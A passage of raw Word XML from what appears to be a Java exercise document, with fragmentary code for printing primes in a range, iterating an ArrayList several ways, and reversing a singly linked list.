          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="331" w:name="_Toc196307811"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00B63643" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="009412A7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00B63643" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">rint prime numbers </w:t>
      </w:r>
      <w:r w:rsidR="00464D04" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>in range</w:t>
      </w:r>
      <w:r w:rsidR="00B63643" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>? Ex: 24 to 100</w:t>
      </w:r>
      <w:bookmarkEnd w:id="331"/>
    </w:p>
    <w:p w14:paraId="24CC96DB" w14:textId="329F65C2" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AF9A5D"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rimeNumbersInRang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6C1A765"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3F9DB8"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ethod to check if a number is prime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39924F05"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isPrime</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CEE4EFB"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Handle edge cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D58B6B2"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um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F659763"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276DB12B"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632905E"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4CD94681"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heck divisibility from 2 to the square root of num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672B355"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n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9569002"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8DF652F"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Not prime if divisible by any number other than 1 and itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39885A"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330BB16"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F862564"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38554478"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u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ime if no divisors were found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3092F3"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4824892"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526F024"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Method to print all prime numbers in a given range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D76C86"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printPrimesInRange</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star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n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06B032F"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ar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n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465E5E3"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Pri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4310EB5"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590DF60B"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7A4D7FF"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9FEF680"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543746D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D650F7"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3ECE5A0"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star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4</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tart of the range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1232196C"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n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0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End of the range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27060619"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2D24B9F6"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int prime numbers in the given range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FED3C7"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rime numbers between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ar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and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n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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0F6915"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printPrimesInRan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ar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nd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3F4B22" w14:textId="77777777"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DCD168B" w14:textId="1E683F3B" w:rsidR="008C6EBB" w:rsidRPr="00CE4B95"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276FD2EE" w14:textId="77777777" w:rsidR="00491E6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00491E6E" w:rsidP="00491E6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62ACD3BF" w14:textId="16ED1D4E" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="332" w:name="_Toc196307812"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="004C2FAA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00613E49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="004C2FAA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>terate ArrayList in different ways</w:t>
      </w:r>
      <w:bookmarkEnd w:id="332"/>
    </w:p>
    <w:p w14:paraId="20FF5273" w14:textId="79A77F73" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0790BE13"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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D88A6F"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Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C43B29E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C283F9F"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ListIterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1DAA01"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000FA9C8"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ListIterati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3F100B8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB59358"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3E29239"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e an ArrayList and add some elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56108D44"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lis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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54084D95"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lis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pple"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D952BD6"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lis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Banana"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBFA15C"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lis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Cherry"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589E207C"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lis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Date"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45511BA0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D9627"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1. Using a classic for loop (index-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F962584"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Using classic for loop:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2A2082"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iz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12DCFC0"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is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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6587DF40"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88C86AC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321747F5"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2. Using enhanced for loop (for-each loop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423042D1"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Using enhanced for loop:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50802A56"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frui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FE4F9FC"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ruit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E572318"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FEA34CD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F8514B"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3. Using Iterator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F53AC9F"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Using Iterator:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38122BB3"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terator</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iterato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terator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2346FF"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whi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terat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hasNex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0677DBA"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terator</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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F2148"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FBCC9C1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6894E207"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4. Using ListIterator (Bidirectional iteration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B01C7B"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Using ListIterator (forward):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294170C7"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Iterator</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listIterato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istIterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9050D1"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whi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istIterat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hasNex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179498E"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istIterator</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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75078813"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFC49A6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A22BD0"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Using ListIterator (Backward iteration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2977A17B"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Using ListIterator (backward):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7ABA22"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whi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istIterat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hasPreviou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8438B03"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istIterat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evious</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7238B1DA"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40BE824"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D56EF0"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5. Using Java 8 Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320DE06E"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Using Streams:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59679D5F"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orEach</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p>
    <w:p w14:paraId="770D354D" w14:textId="77777777"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C04CE93" w14:textId="61468E49" w:rsidR="00D132C0" w:rsidRPr="00CE4B95"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5EA40BB8" w14:textId="77777777" w:rsidR="004C2FAA" w:rsidRPr="00CE4B95" w:rsidRDefault="004C2FAA" w:rsidP="004C2FAA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5970235B" w14:textId="226BB2A4" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="333" w:name="_Toc196307813"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00786506" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00205CE3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00786506" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>everse a singly linked list</w:t>
      </w:r>
      <w:bookmarkEnd w:id="333"/>
    </w:p>
    <w:p w14:paraId="04AB129D" w14:textId="326CDDC3" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D506CFD"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Node class to represent each element in the linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3171F616"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Nod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BFA6B1A"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data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EBBEBA"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Nod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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F00D031"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5D3FD3D9"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onstructor to initialize the node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF02F9"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Node</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dat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911EDCF"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dat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data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD1902"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x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p>
    <w:p w14:paraId="2015307A"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7F18E7C"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F426E7"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09854F6D"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yLinkedLis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A44C477"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> head</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B31E818"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64A1928B"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ethod to reverse the singly linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FD6AF"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revers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45BB88A"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> prev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p>
    <w:p w14:paraId="3DC34C1E"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur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head</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084BE767"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Nod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x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p>
    <w:p w14:paraId="62F91F5A"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0A349DBC"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whi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cur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F93E734"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tore the next node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08196852"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x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urr</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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C3CEA1"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5FDAE335"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Reverse the current node's pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4B5798"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curr</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x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rev</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446C5F46"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0C8FE06B"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ove the prev and curr pointers one step forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A11023"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prev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urr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4C915"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cur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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D31794"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53C4070"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3380E0F4"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After the loop, prev will be the new head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7242C96E"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hea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rev</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
